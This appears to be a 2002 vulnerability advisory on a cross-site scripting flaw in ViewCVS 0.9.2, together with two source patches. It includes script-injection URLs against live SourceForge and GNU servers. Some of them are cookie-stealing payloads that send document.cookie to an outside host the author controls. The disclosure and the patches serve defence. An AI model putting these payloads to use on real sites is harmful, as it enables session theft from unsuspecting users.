ViewCVS: cross-site scripting bug I found the following cross-site scripting vulnerability in ViewCVS: Details ------------ Product: ViewCVS Affected Version: 0.9.2 and under it Vendor's URL: http://viewcvs.sourceforge.net/ Vendor Status: Informed. And they already fixed it only in their team. But nothing has been published. Introduction ------------ ViewCVS is a WWW interface for CVS Repositories. It is widely used in freesoft community and open source community. Unfortunately, it has the vulnerability of cross-site scripting. Proof ----------------- If you access to the URL like; http://target_site/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert("hello")</script> http://target_site/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev"><script>alert("hello")</script> The former URL is valid for Internet Explorer 6.0, Opera 6.01, but not valid for Netscape 4.78, Netscape 6.2.2, mozilla 0.9.9 on windows XP. And these URL can do is only showing a popup window appearing. Example ----------------- For example, you can see the vulnerability at the SourceForge.net (Vendor's site is on SourceForge.net). If you access to the sample URL following, your cookie (including your login information and session information about SourceForge.net) is stolen by my site (http://www.office.ac) The stolen cookie's information of Internet Explorer 6.0 includes your login information and session information about SourceForge.net. But the stolen cookie's information of Opera 6.01 and mozilla 0.9.9 includes only user name, and the cookie information of Netscape 4.78 and 6.2.2 is nothing. (I don't know why.) http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert("ALERT:%20Now,%20your%20cookie%20about%20sourceforge.net%20is%20stolen%20by%20www.office.ac");window.open('http://www.office.ac/j.cgi?'%2Bdocument.cookie);</script> http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev"><script>alert("ALERT:%20Now,%20your%20cookie%20about%20sourceforge.net%20is%20stolen%20by%20www.office.ac");window.open('http://www.office.ac/j.cgi?'%2Bdocument.cookie);</script> The ViewCVS at SourceForge.net is not newest version. And you can see the vulnerability of newest version of ViewCVS at GNU. http://subversions.gnu.org/cgi-bin/viewcvs/?cvsroot=<script>alert("hello")</script> http://subversions.gnu.org/cgi-bin/viewcvs/cvs-utils/CVSROOT/?sortby=rev"><script>alert("hello")</script> Vendor status -------------- Vendors are noticed at 13 Mar 2002, and 26 Mar 2002. And I heard following: Some Japanese hackers (contributors belong to SourceForge.jp and Hyper NIKKI System Project) proposed a patch program to ViewCVS team in April. But ViewCVS team rejected it. ViewCVS team said they fixed it at April 1st. But nothing has been published by ViewCVS team after it. Patch -------------- Two patches are here. I got these patches with the non-safe method, so I am not sure that their code are completely same to original. And I cannot understand about code nor programming at all. So I don't have any accountability about these patch. One was made by Kenji Suzuki <kenji@po.ganseki.ne.jp> / Hyper NIKKI System Project (http://www.h14m.org/). I heard it has been applied to the web page of Hyper NIKKI System Project, and Sourceforge.jp. --- viewcvs.py.orig Fri Dec 14 23:14:39 2001 +++ viewcvs.py Sun Mar 31 15:24:34 2002 @@ -172,7 +172,7 @@ # parse the query params into a dictionary (and use defaults) query_dict = default_settings.copy() for name, values in cgi.parse().items(): - query_dict[name] = values[0] + query_dict[name] = cgi.escape(values[0]) # set up query strings, prefixed by question marks and ampersands query = sticky_query(query_dict) I heart another patch is made by ViewCVS team. I got this code from Taku YASUI <tach@sourceforge.jp> / Sourceforge.jp (http://sourceforge.jp/) who had been proposed former patch to ViewCVS team. =================================================================== RCS file: /cvsroot/viewcvs/viewcvs/lib/viewcvs.py,v retrieving revision 1.107 retrieving revision 1.108 diff -u -r1.107 -r1.108 --- viewcvs/viewcvs/lib/viewcvs.py 2002/02/22 09:20:46 1.107 +++ viewcvs/viewcvs/lib/viewcvs.py 2002/04/01 01:32:16 1.108 @@ -180,8 +180,14 @@ # parse the query params into a dictionary (and use defaults) query_dict = default_settings.copy() + + # RE that ViewCVS doesn't use in any URL, but a CSS attack might + re_url_validate = re.compile('\'|"|<|>') for name, values in cgi.parse().items(): - query_dict[name] = values[0] + # do not accept values that contain non-ViewCVS characters + # except for search + if not re.search(re_url_validate, values[0]) or name == 'search': + query_dict[name] = values[0] # set up query strings, prefixed by question marks and ampersands query = sticky_query(query_dict) -- office office@ukky.net office@office.ac http://www.office.ac/